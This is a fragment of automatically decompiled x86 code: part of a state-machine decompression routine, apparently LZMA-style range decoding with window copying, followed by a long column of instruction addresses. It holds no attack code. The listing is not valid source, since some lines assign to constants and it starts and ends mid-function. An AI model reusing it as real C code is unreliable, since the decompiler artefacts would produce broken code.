									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                                          0x00405e09
                                                                                                                          0x00405e10
                                                                                                                          0x00405e16
                                                                                                                          0x00405e1c
                                                                                                                          0x00000000
                                                                                                                          0x00405e20
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e35
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00000000
                                                                                                                          0x00405e42
                                                                                                                          0x00405e46
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e4f
                                                                                                                          0x00405e52
                                                                                                                          0x00405e55
                                                                                                                          0x00405e57
                                                                                                                          0x00405e59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e5f
                                                                                                                          0x00405e62
                                                                                                                          0x00405e64
                                                                                                                          0x00405e65
                                                                                                                          0x00405e68
                                                                                                                          0x00405e6a
                                                                                                                          0x00405e6b
                                                                                                                          0x00405e6d
                                                                                                                          0x00405e70
                                                                                                                          0x00405e75
                                                                                                                          0x00405e7a
                                                                                                                          0x00405e83
                                                                                                                          0x00405e96
                                                                                                                          0x00405e99
                                                                                                                          0x00405ea2
                                                                                                                          0x00405ea5
                                                                                                                          0x00405ecd
                                                                                                                          0x00405ecd
                                                                                                                          0x00405ecf
                                                                                                                          0x00405edd
                                                                                                                          0x00405edd
                                                                                                                          0x00405ee1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed4
                                                                                                                          0x00405ed4
                                                                                                                          0x00405ed5
                                                                                                                          0x00405ed5
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ea7
                                                                                                                          0x00405eab
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb9
                                                                                                                          0x00405ebf
                                                                                                                          0x00405ec1
                                                                                                                          0x00405ec4
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405ee7
                                                                                                                          0x00405ee7
                                                                                                                          0x00405eeb
                                                                                                                          0x00406797
                                                                                                                          0x00000000
                                                                                                                          0x00406797
                                                                                                                          0x00405ef4
                                                                                                                          0x00405f04
                                                                                                                          0x00405f07
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0d
                                                                                                                          0x00405f0d
                                                                                                                          0x00405f11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f13
                                                                                                                          0x00405f16
                                                                                                                          0x00405f19
                                                                                                                          0x00405f43
                                                                                                                          0x00405f49
                                                                                                                          0x00405f50
                                                                                                                          0x00000000
                                                                                                                          0x00405f50
                                                                                                                          0x00405f1b
                                                                                                                          0x00405f1f
                                                                                                                          0x00405f22
                                                                                                                          0x00405f27
                                                                                                                          0x00405f27
                                                                                                                          0x00405f32
                                                                                                                          0x00405f38
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f82
                                                                                                                          0x00405f88
                                                                                                                          0x00405f8b
                                                                                                                          0x00405f98
                                                                                                                          0x00405fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f57
                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f7e
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406626
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x0040665c
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406665
                                                                                                                          0x00406665
                                                                                                                          0x00406669
                                                                                                                          0x00406818
                                                                                                                          0x00000000
                                                                                                                          0x00406818
                                                                                                                          0x00406675
                                                                                                                          0x0040667c
                                                                                                                          0x00406684
                                                                                                                          0x00406684
                                                                                                                          0x00406684
                                                                                                                          0x00406687
                                                                                                                          0x0040668a
                                                                                                                          0x0040668a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00000000
                                                                                                                          0x00406035
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00406018
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00000000
                                                                                                                          0x00406380
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x004063a6
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063b2
                                                                                                                          0x004063b9
                                                                                                                          0x004063be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406063
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x00406069
                                                                                                                          0x0040606c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060a9
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060d8
                                                                                                                          0x004060dc
                                                                                                                          0x004060de
                                                                                                                          0x004060e2
                                                                                                                          0x004060ae
                                                                                                                          0x004060ae
                                                                                                                          0x004060b2
                                                                                                                          0x004060ba
                                                                                                                          0x004060bf
                                                                                                                          0x004060c1
                                                                                                                          0x004060c3
                                                                                                                          0x004060c3
                                                                                                                          0x004060e5
                                                                                                                          0x004060ec
                                                                                                                          0x004060ef
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060fa
                                                                                                                          0x004060fa
                                                                                                                          0x004060fe
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x00406104
                                                                                                                          0x00406107
                                                                                                                          0x0040610a
                                                                                                                          0x0040610e
                                                                                                                          0x00406111
                                                                                                                          0x00406117
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x0040611c
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x00406125
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406127
                                                                                                                          0x0040612a
                                                                                                                          0x0040612d
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613c
                                                                                                                          0x0040613f
                                                                                                                          0x00406142
                                                                                                                          0x00406145
                                                                                                                          0x0040615d
                                                                                                                          0x00406160
                                                                                                                          0x00406163
                                                                                                                          0x00406166
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x0040616d
                                                                                                                          0x0040616f
                                                                                                                          0x00406147
                                                                                                                          0x00406147
                                                                                                                          0x0040614f
                                                                                                                          0x00406154
                                                                                                                          0x00406156
                                                                                                                          0x00406158
                                                                                                                          0x00406158
                                                                                                                          0x00406172
                                                                                                                          0x00406179
                                                                                                                          0x0040617c
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x0040617c
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061be
                                                                                                                          0x004061be
                                                                                                                          0x004061c2
                                                                                                                          0x004067ca
                                                                                                                          0x00000000
                                                                                                                          0x004067ca
                                                                                                                          0x004061c8
                                                                                                                          0x004061cb
                                                                                                                          0x004061ce
                                                                                                                          0x004061d2
                                                                                                                          0x004061d5
                                                                                                                          0x004061db
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e3
                                                                                                                          0x004061e3
                                                                                                                          0x004061e9
                                                                                                                          0x00406187
                                                                                                                          0x00406187
                                                                                                                          0x0040618a
                                                                                                                          0x00000000
                                                                                                                          0x0040618a
                                                                                                                          0x004061eb
                                                                                                                          0x004061eb
                                                                                                                          0x004061ee
                                                                                                                          0x004061f1
                                                                                                                          0x004061f4
                                                                                                                          0x004061f7
                                                                                                                          0x004061fa
                                                                                                                          0x004061fd
                                                                                                                          0x00406200
                                                                                                                          0x00406203
                                                                                                                          0x00406206
                                                                                                                          0x00406209
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406227
                                                                                                                          0x0040622a
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040620b
                                                                                                                          0x0040620b
                                                                                                                          0x00406213
                                                                                                                          0x00406218
                                                                                                                          0x0040621a
                                                                                                                          0x0040621c
                                                                                                                          0x0040621c
                                                                                                                          0x00406236
                                                                                                                          0x0040623d
                                                                                                                          0x00406240
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x004064cf
                                                                                                                          0x004064cf
                                                                                                                          0x004064d3
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x004067fa
                                                                                                                          0x004064d9
                                                                                                                          0x004064dc
                                                                                                                          0x004064df
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064ec
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629f
                                                                                                                          0x0040629f
                                                                                                                          0x004062a2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065de
                                                                                                                          0x004065e2
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x00406611
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x004065e4
                                                                                                                          0x004065e7
                                                                                                                          0x004065eb
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
